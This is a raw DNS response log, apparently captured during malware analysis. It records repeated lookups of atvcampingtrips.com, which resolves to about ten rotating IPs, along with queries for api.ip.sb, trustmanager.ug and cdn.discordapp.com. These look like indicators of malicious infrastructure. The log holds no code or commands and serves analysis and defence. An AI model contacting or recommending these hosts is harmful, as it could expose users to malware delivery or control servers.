Aug 23, 2021 02:08:33.301907063 CEST	8.8.8.8	192.168.2.3	0x7704	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:33.301907063 CEST	8.8.8.8	192.168.2.3	0x7704	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:33.301907063 CEST	8.8.8.8	192.168.2.3	0x7704	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:33.301907063 CEST	8.8.8.8	192.168.2.3	0x7704	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:34.505701065 CEST	8.8.8.8	192.168.2.3	0xf0fd	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:34.505701065 CEST	8.8.8.8	192.168.2.3	0xf0fd	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:34.505701065 CEST	8.8.8.8	192.168.2.3	0xf0fd	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:34.505701065 CEST	8.8.8.8	192.168.2.3	0xf0fd	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:34.505701065 CEST	8.8.8.8	192.168.2.3	0xf0fd	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:34.505701065 CEST	8.8.8.8	192.168.2.3	0xf0fd	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:34.505701065 CEST	8.8.8.8	192.168.2.3	0xf0fd	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:34.505701065 CEST	8.8.8.8	192.168.2.3	0xf0fd	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:34.505701065 CEST	8.8.8.8	192.168.2.3	0xf0fd	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:34.505701065 CEST	8.8.8.8	192.168.2.3	0xf0fd	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:36.275801897 CEST	8.8.8.8	192.168.2.3	0xcd60	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:36.275801897 CEST	8.8.8.8	192.168.2.3	0xcd60	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:36.275801897 CEST	8.8.8.8	192.168.2.3	0xcd60	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:36.275801897 CEST	8.8.8.8	192.168.2.3	0xcd60	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:36.275801897 CEST	8.8.8.8	192.168.2.3	0xcd60	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:36.275801897 CEST	8.8.8.8	192.168.2.3	0xcd60	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:36.275801897 CEST	8.8.8.8	192.168.2.3	0xcd60	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:36.275801897 CEST	8.8.8.8	192.168.2.3	0xcd60	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:36.275801897 CEST	8.8.8.8	192.168.2.3	0xcd60	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:36.275801897 CEST	8.8.8.8	192.168.2.3	0xcd60	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:38.311517954 CEST	8.8.8.8	192.168.2.3	0x6284	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Aug 23, 2021 02:08:39.546825886 CEST	8.8.8.8	192.168.2.3	0x369a	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Aug 23, 2021 02:08:41.966301918 CEST	8.8.8.8	192.168.2.3	0x3630	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:41.966301918 CEST	8.8.8.8	192.168.2.3	0x3630	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:41.966301918 CEST	8.8.8.8	192.168.2.3	0x3630	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:41.966301918 CEST	8.8.8.8	192.168.2.3	0x3630	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:41.966301918 CEST	8.8.8.8	192.168.2.3	0x3630	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:41.966301918 CEST	8.8.8.8	192.168.2.3	0x3630	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:41.966301918 CEST	8.8.8.8	192.168.2.3	0x3630	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:41.966301918 CEST	8.8.8.8	192.168.2.3	0x3630	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:41.966301918 CEST	8.8.8.8	192.168.2.3	0x3630	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:41.966301918 CEST	8.8.8.8	192.168.2.3	0x3630	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:43.166605949 CEST	8.8.8.8	192.168.2.3	0xb60b	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:43.166605949 CEST	8.8.8.8	192.168.2.3	0xb60b	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:43.166605949 CEST	8.8.8.8	192.168.2.3	0xb60b	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:43.166605949 CEST	8.8.8.8	192.168.2.3	0xb60b	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:43.166605949 CEST	8.8.8.8	192.168.2.3	0xb60b	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:43.166605949 CEST	8.8.8.8	192.168.2.3	0xb60b	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:43.166605949 CEST	8.8.8.8	192.168.2.3	0xb60b	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:43.166605949 CEST	8.8.8.8	192.168.2.3	0xb60b	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:43.166605949 CEST	8.8.8.8	192.168.2.3	0xb60b	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:43.166605949 CEST	8.8.8.8	192.168.2.3	0xb60b	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:44.729334116 CEST	8.8.8.8	192.168.2.3	0xb56f	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:44.729334116 CEST	8.8.8.8	192.168.2.3	0xb56f	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:44.729334116 CEST	8.8.8.8	192.168.2.3	0xb56f	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:44.729334116 CEST	8.8.8.8	192.168.2.3	0xb56f	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:44.729334116 CEST	8.8.8.8	192.168.2.3	0xb56f	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:44.729334116 CEST	8.8.8.8	192.168.2.3	0xb56f	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:44.729334116 CEST	8.8.8.8	192.168.2.3	0xb56f	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:44.729334116 CEST	8.8.8.8	192.168.2.3	0xb56f	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:44.729334116 CEST	8.8.8.8	192.168.2.3	0xb56f	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:44.729334116 CEST	8.8.8.8	192.168.2.3	0xb56f	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:47.425410986 CEST	8.8.8.8	192.168.2.3	0xd2be	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:47.425410986 CEST	8.8.8.8	192.168.2.3	0xd2be	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:47.425410986 CEST	8.8.8.8	192.168.2.3	0xd2be	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:47.425410986 CEST	8.8.8.8	192.168.2.3	0xd2be	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:47.425410986 CEST	8.8.8.8	192.168.2.3	0xd2be	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:47.425410986 CEST	8.8.8.8	192.168.2.3	0xd2be	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:47.425410986 CEST	8.8.8.8	192.168.2.3	0xd2be	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:47.425410986 CEST	8.8.8.8	192.168.2.3	0xd2be	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:47.425410986 CEST	8.8.8.8	192.168.2.3	0xd2be	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:47.425410986 CEST	8.8.8.8	192.168.2.3	0xd2be	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:48.936439991 CEST	8.8.8.8	192.168.2.3	0xe945	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:48.936439991 CEST	8.8.8.8	192.168.2.3	0xe945	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:48.936439991 CEST	8.8.8.8	192.168.2.3	0xe945	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:48.936439991 CEST	8.8.8.8	192.168.2.3	0xe945	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:48.936439991 CEST	8.8.8.8	192.168.2.3	0xe945	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:48.936439991 CEST	8.8.8.8	192.168.2.3	0xe945	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:48.936439991 CEST	8.8.8.8	192.168.2.3	0xe945	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:48.936439991 CEST	8.8.8.8	192.168.2.3	0xe945	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:48.936439991 CEST	8.8.8.8	192.168.2.3	0xe945	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:48.936439991 CEST	8.8.8.8	192.168.2.3	0xe945	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:50.435395956 CEST	8.8.8.8	192.168.2.3	0x1e99	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:50.435395956 CEST	8.8.8.8	192.168.2.3	0x1e99	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:50.435395956 CEST	8.8.8.8	192.168.2.3	0x1e99	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:50.435395956 CEST	8.8.8.8	192.168.2.3	0x1e99	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:50.435395956 CEST	8.8.8.8	192.168.2.3	0x1e99	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:50.435395956 CEST	8.8.8.8	192.168.2.3	0x1e99	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:50.435395956 CEST	8.8.8.8	192.168.2.3	0x1e99	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:50.435395956 CEST	8.8.8.8	192.168.2.3	0x1e99	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:50.435395956 CEST	8.8.8.8	192.168.2.3	0x1e99	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:50.435395956 CEST	8.8.8.8	192.168.2.3	0x1e99	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:52.015902996 CEST	8.8.8.8	192.168.2.3	0x4aca	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:52.015902996 CEST	8.8.8.8	192.168.2.3	0x4aca	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:52.015902996 CEST	8.8.8.8	192.168.2.3	0x4aca	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:52.015902996 CEST	8.8.8.8	192.168.2.3	0x4aca	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:52.015902996 CEST	8.8.8.8	192.168.2.3	0x4aca	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:52.015902996 CEST	8.8.8.8	192.168.2.3	0x4aca	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:52.015902996 CEST	8.8.8.8	192.168.2.3	0x4aca	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:52.015902996 CEST	8.8.8.8	192.168.2.3	0x4aca	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:52.015902996 CEST	8.8.8.8	192.168.2.3	0x4aca	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:52.015902996 CEST	8.8.8.8	192.168.2.3	0x4aca	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:53.678139925 CEST	8.8.8.8	192.168.2.3	0xa006	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:53.678139925 CEST	8.8.8.8	192.168.2.3	0xa006	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:53.678139925 CEST	8.8.8.8	192.168.2.3	0xa006	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:53.678139925 CEST	8.8.8.8	192.168.2.3	0xa006	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:53.678139925 CEST	8.8.8.8	192.168.2.3	0xa006	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:53.678139925 CEST	8.8.8.8	192.168.2.3	0xa006	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:53.678139925 CEST	8.8.8.8	192.168.2.3	0xa006	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:53.678139925 CEST	8.8.8.8	192.168.2.3	0xa006	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:53.678139925 CEST	8.8.8.8	192.168.2.3	0xa006	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:53.678139925 CEST	8.8.8.8	192.168.2.3	0xa006	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:55.256870031 CEST	8.8.8.8	192.168.2.3	0xb692	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:55.256870031 CEST	8.8.8.8	192.168.2.3	0xb692	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:55.256870031 CEST	8.8.8.8	192.168.2.3	0xb692	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:55.256870031 CEST	8.8.8.8	192.168.2.3	0xb692	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:55.256870031 CEST	8.8.8.8	192.168.2.3	0xb692	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:55.256870031 CEST	8.8.8.8	192.168.2.3	0xb692	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:55.256870031 CEST	8.8.8.8	192.168.2.3	0xb692	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:55.256870031 CEST	8.8.8.8	192.168.2.3	0xb692	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:55.256870031 CEST	8.8.8.8	192.168.2.3	0xb692	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:55.256870031 CEST	8.8.8.8	192.168.2.3	0xb692	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:57.572257996 CEST	8.8.8.8	192.168.2.3	0xdb3b	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:57.572257996 CEST	8.8.8.8	192.168.2.3	0xdb3b	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:57.572257996 CEST	8.8.8.8	192.168.2.3	0xdb3b	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:57.572257996 CEST	8.8.8.8	192.168.2.3	0xdb3b	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:57.572257996 CEST	8.8.8.8	192.168.2.3	0xdb3b	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:57.572257996 CEST	8.8.8.8	192.168.2.3	0xdb3b	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:57.572257996 CEST	8.8.8.8	192.168.2.3	0xdb3b	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:57.572257996 CEST	8.8.8.8	192.168.2.3	0xdb3b	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:57.572257996 CEST	8.8.8.8	192.168.2.3	0xdb3b	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:57.572257996 CEST	8.8.8.8	192.168.2.3	0xdb3b	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:57.742419958 CEST	8.8.8.8	192.168.2.3	0x3dd0	No error (0)	trustmanager.ug		185.206.180.136	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:57.742419958 CEST	8.8.8.8	192.168.2.3	0x3dd0	No error (0)	trustmanager.ug		46.166.184.122	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:57.936482906 CEST	8.8.8.8	192.168.2.3	0xf8f5	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:57.936482906 CEST	8.8.8.8	192.168.2.3	0xf8f5	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:57.936482906 CEST	8.8.8.8	192.168.2.3	0xf8f5	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:57.936482906 CEST	8.8.8.8	192.168.2.3	0xf8f5	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:57.936482906 CEST	8.8.8.8	192.168.2.3	0xf8f5	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:58.843041897 CEST	8.8.8.8	192.168.2.3	0xe9b6	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:58.843041897 CEST	8.8.8.8	192.168.2.3	0xe9b6	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:58.843041897 CEST	8.8.8.8	192.168.2.3	0xe9b6	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:58.843041897 CEST	8.8.8.8	192.168.2.3	0xe9b6	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:58.843041897 CEST	8.8.8.8	192.168.2.3	0xe9b6	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:58.843041897 CEST	8.8.8.8	192.168.2.3	0xe9b6	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:58.843041897 CEST	8.8.8.8	192.168.2.3	0xe9b6	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:58.843041897 CEST	8.8.8.8	192.168.2.3	0xe9b6	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:58.843041897 CEST	8.8.8.8	192.168.2.3	0xe9b6	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:08:58.843041897 CEST	8.8.8.8	192.168.2.3	0xe9b6	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:00.440097094 CEST	8.8.8.8	192.168.2.3	0xf82b	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:00.440097094 CEST	8.8.8.8	192.168.2.3	0xf82b	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:00.440097094 CEST	8.8.8.8	192.168.2.3	0xf82b	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:00.440097094 CEST	8.8.8.8	192.168.2.3	0xf82b	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:00.440097094 CEST	8.8.8.8	192.168.2.3	0xf82b	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:00.440097094 CEST	8.8.8.8	192.168.2.3	0xf82b	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:00.440097094 CEST	8.8.8.8	192.168.2.3	0xf82b	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:00.440097094 CEST	8.8.8.8	192.168.2.3	0xf82b	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:00.440097094 CEST	8.8.8.8	192.168.2.3	0xf82b	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:00.440097094 CEST	8.8.8.8	192.168.2.3	0xf82b	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:01.992798090 CEST	8.8.8.8	192.168.2.3	0x237f	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:01.992798090 CEST	8.8.8.8	192.168.2.3	0x237f	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:01.992798090 CEST	8.8.8.8	192.168.2.3	0x237f	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:01.992798090 CEST	8.8.8.8	192.168.2.3	0x237f	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:01.992798090 CEST	8.8.8.8	192.168.2.3	0x237f	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:01.992798090 CEST	8.8.8.8	192.168.2.3	0x237f	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:01.992798090 CEST	8.8.8.8	192.168.2.3	0x237f	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:01.992798090 CEST	8.8.8.8	192.168.2.3	0x237f	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:01.992798090 CEST	8.8.8.8	192.168.2.3	0x237f	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:01.992798090 CEST	8.8.8.8	192.168.2.3	0x237f	No error (0)	atvcampingtrips.com		170.84.181.70	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:07.344168901 CEST	8.8.8.8	192.168.2.3	0x4ce7	No error (0)	atvcampingtrips.com		220.125.1.129	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:07.344168901 CEST	8.8.8.8	192.168.2.3	0x4ce7	No error (0)	atvcampingtrips.com		115.91.207.131	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:07.344168901 CEST	8.8.8.8	192.168.2.3	0x4ce7	No error (0)	atvcampingtrips.com		187.156.128.15	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:07.344168901 CEST	8.8.8.8	192.168.2.3	0x4ce7	No error (0)	atvcampingtrips.com		218.233.73.202	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:07.344168901 CEST	8.8.8.8	192.168.2.3	0x4ce7	No error (0)	atvcampingtrips.com		211.169.6.249	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:07.344168901 CEST	8.8.8.8	192.168.2.3	0x4ce7	No error (0)	atvcampingtrips.com		222.236.49.124	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:07.344168901 CEST	8.8.8.8	192.168.2.3	0x4ce7	No error (0)	atvcampingtrips.com		211.170.70.236	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:07.344168901 CEST	8.8.8.8	192.168.2.3	0x4ce7	No error (0)	atvcampingtrips.com		211.53.230.69	A (IP address)	IN (0x0001)
Aug 23, 2021 02:09:07.344168901 CEST	8.8.8.8	192.168.2.3	0x4ce7	No error (0)	atvcampingtrips.com		124.109.61.160	A (IP address)	IN (0x0001)
